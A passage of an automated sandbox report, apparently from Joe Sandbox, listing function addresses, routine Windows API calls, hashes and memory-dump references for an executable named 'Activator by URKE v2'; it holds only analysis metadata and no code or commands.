                                                                                                                                                                                                                                                  • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                  • Instruction ID: 79be0e7ae524ae8d63780ff9c5fc80dc629c4e4bbf57c946f284a3829e5c2831
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F0EC66A3855683EF90AB60E875BB6A361FF94F09FC45032E64EC2854DF3CD609CB11
                                                                                                                                                                                                                                                  Function 00007FF7E5F053BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2414 7ff7e5f053bc-7ff7e5f05402 call 7ff7e5ef4a70 2415 7ff7e5f05408-7ff7e5f05415 2414->2415 2416 7ff7e5f05665 2415->2416 2417 7ff7e5f0541b-7ff7e5f0541e 2415->2417 2418 7ff7e5f05667-7ff7e5f0568e call 7ff7e5f15c30 2416->2418 2417->2416 2419 7ff7e5f05424-7ff7e5f05427 2417->2419 2419->2416 2421 7ff7e5f0542d-7ff7e5f05436 2419->2421 2421->2416 2423 7ff7e5f0543c-7ff7e5f05445 2421->2423 2423->2416 2424 7ff7e5f0544b-7ff7e5f05485 call 7ff7e5ef6288 2423->2424 2427 7ff7e5f05492-7ff7e5f054a9 2424->2427 2428 7ff7e5f05487-7ff7e5f0548b 2424->2428 2429 7ff7e5f05501-7ff7e5f05508 2427->2429 2430 7ff7e5f054ab-7ff7e5f054b2 2427->2430 2428->2427 2432 7ff7e5f05512-7ff7e5f0551c 2429->2432 2433 7ff7e5f0550a-7ff7e5f0550d call 7ff7e5f01dd0 2429->2433 2431 7ff7e5f054b4-7ff7e5f054ff call 7ff7e5f01bf4 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef8d18 2430->2431 2430->2432 2431->2432 2434 7ff7e5f0552f-7ff7e5f05542 call 7ff7e5f04e68 2432->2434 2435 7ff7e5f0551e-7ff7e5f05526 2432->2435 2433->2432 2442 7ff7e5f0562d-7ff7e5f05635 2434->2442 2443 7ff7e5f05548-7ff7e5f05598 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5f00114 2434->2443 2435->2434 2442->2416 2447 7ff7e5f05637-7ff7e5f05649 2442->2447 2464 7ff7e5f055cc-7ff7e5f055ec 2443->2464 2465 7ff7e5f0559a-7ff7e5f055ac 2443->2465 2450 7ff7e5f05660 call 7ff7e5f15b1c 2447->2450 2451 7ff7e5f0564b-7ff7e5f0565e 2447->2451 2450->2416 2451->2450 2454 7ff7e5f0568f-7ff7e5f05694 call 7ff7e5f1ae94 2451->2454 2461 7ff7e5f05695-7ff7e5f0569b call 7ff7e5f1ae94 2454->2461 2471 7ff7e5f055ee-7ff7e5f055f6 2464->2471 2472 7ff7e5f0562b 2464->2472 2467 7ff7e5f055ae-7ff7e5f055c1 2465->2467 2468 7ff7e5f055c7 call 7ff7e5f15b1c 2465->2468 2467->2461 2467->2468 2468->2464 2473 7ff7e5f05626-7ff7e5f05629 2471->2473 2474 7ff7e5f055f8-7ff7e5f0560a 2471->2474 2472->2442 2473->2418 2475 7ff7e5f05621 call 7ff7e5f15b1c 2474->2475 2476 7ff7e5f0560c-7ff7e5f0561f 2474->2476 2475->2473 2476->2454 2476->2475
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F0568F
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F05695
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F01DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5F01E25
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                                                                                                                                                                                                                  • String ID: zip$zipx
                                                                                                                                                                                                                                                  • API String ID: 2713956076-1268445101
                                                                                                                                                                                                                                                  • Opcode ID: d8d2ea2c5374122acc69c3193e031fe88e98369d5f1618340fb179d33e827a7f
                                                                                                                                                                                                                                                  • Instruction ID: 08f97d4b09b385d410f0ad63a89b57723b5386a8b60eec2a1d7b9901c6b40684
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d2ea2c5374122acc69c3193e031fe88e98369d5f1618340fb179d33e827a7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A81B061F08A0A85FA00EB65E8603FCA362AF44F99FC40233DE5D97695DE7CE555C322
                                                                                                                                                                                                                                                  Function 00007FF7E5F0CE24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                                                                  • String ID: EDIT
                                                                                                                                                                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                                                                                                                                                                  • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                  • Instruction ID: 444d90a050dfd41c0c536f04c9f9229a3773c965423c31db5f7f37eae0842815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B013661B1964B41FA20BB21E8307F6E354AF59F94FC85033C94D87695DE3CD549CB21
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4E18 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4209713984-0
                                                                                                                                                                                                                                                  • Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                  • Instruction ID: 3f63431d988ab882c7592b6bc3a30d1d39ca862b5f5c9810f9432a914309cb4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA51E862B1975A92EB20EB25D6647B9A360BF44F94FC01133DA8D8B690DF3CE454C721
                                                                                                                                                                                                                                                  Function 00007FF7E5F00120 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2912839123-0
                                                                                                                                                                                                                                                  • Opcode ID: 90840ec6fdea3326dc6836d829e73a3af53da93e834a76650bb7e12bad06c41e
                                                                                                                                                                                                                                                  • Instruction ID: d1a48c9ff5895c7bbdd04ed0f7f700a8cc1730cef7fb6f0efdcae7a81ba09e2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90840ec6fdea3326dc6836d829e73a3af53da93e834a76650bb7e12bad06c41e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3151BE62F1479980FA00ABA5D5643ECB322AF44FD4F900237DA5C9BADADE7CD4448322
                                                                                                                                                                                                                                                  Function 00007FF7E5F1653C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452418845-0
                                                                                                                                                                                                                                                  • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                  • Instruction ID: db2e930ff9ed62f479fd54e9ffeae73c3cc902732108928ed39ee86aeeb0a715
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE311A21E0820B85FA14BB6596723F9A2919F41B84FC4443BD94ECBAD7DE3DF8058633
                                                                                                                                                                                                                                                  Function 00007FF7E5EF5C60 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2359106489-0
                                                                                                                                                                                                                                                  • Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                  • Instruction ID: 6cb3d033ec54a79585ba7c2cafc74cf2e66240ddc5f14a51580e9a9565ae9166
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B310722A0D74A81EA20BB25A66837EE251FF94F90FD40233DDDDCB695DF3CD4518222
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4520 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2244327787-0
                                                                                                                                                                                                                                                  • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                  • Instruction ID: 0466613050fe8e35fbadd09a6f21f0f18dc2d2a043b8bdf893b1a2723fffa408
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9218821A0C74981EA30BF51A510339E7A4EF45F94FD44532DADD8F688DEBCE8658732
                                                                                                                                                                                                                                                  Function 00007FF7E5F0D0A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                                                                  • String ID: riched20.dll
                                                                                                                                                                                                                                                  • API String ID: 174490985-3360196438
                                                                                                                                                                                                                                                  • Opcode ID: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                  • Instruction ID: 72f6332b46c897767135df0ba7a581254b6aac21cf1513f86683d6718dc37896
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF04471658A4583D710AB10E4642EEF3A0FF84B54F840136E68D82A54DF7CD558CB11
                                                                                                                                                                                                                                                  Function 00007FF7E5F0DAC4 Relevance: 4.6, APIs: 3, Instructions: 146COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2032784890-0
                                                                                                                                                                                                                                                  • Opcode ID: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
                                                                                                                                                                                                                                                  • Instruction ID: c1da1f04f3bfaf503a11d8d769ca391138430a4ad6b15c081a73fb4e8cdc45b3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F161AF72B04B49C9EB00EF64C8A43EC7361EB44B98F844636DA4C97BA9DF38D595C321
                                                                                                                                                                                                                                                  Function 00007FF7E5EFCD00 Relevance: 4.6, APIs: 3, Instructions: 116COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: c6bd5507c53fc2c7cee36f601fc2038259921ec603ce2f08595e4049bb8499e8
                                                                                                                                                                                                                                                  • Instruction ID: 2cb10421267c4f8e199e52199bbeab210a51f4207bc5b284b4b133797ef26243
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6bd5507c53fc2c7cee36f601fc2038259921ec603ce2f08595e4049bb8499e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0141C552F2865944FB00E7B5D6663FC93216F45FA8FE00732DE6D9A6C6DF7C90408221
                                                                                                                                                                                                                                                  Function 00007FF7E5EF4334 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2272807158-0
                                                                                                                                                                                                                                                  • Opcode ID: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                  • Instruction ID: 784ba634c170372ba8fa75cb0cb49919c7b4a3a64fb37f9cd7b79e1d6d316d6f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F941C67261878982EB20AB15E554369A3A1FB44BB4F900336DFED47AD5DF3CD4A08721
                                                                                                                                                                                                                                                  Function 00007FF7E5EF1FF8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2176759853-0
                                                                                                                                                                                                                                                  • Opcode ID: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                  • Instruction ID: 77fd6a3a4e6ee4cf12f3c7893b18cc1018e628c616b2920b2df8e46486a37d84
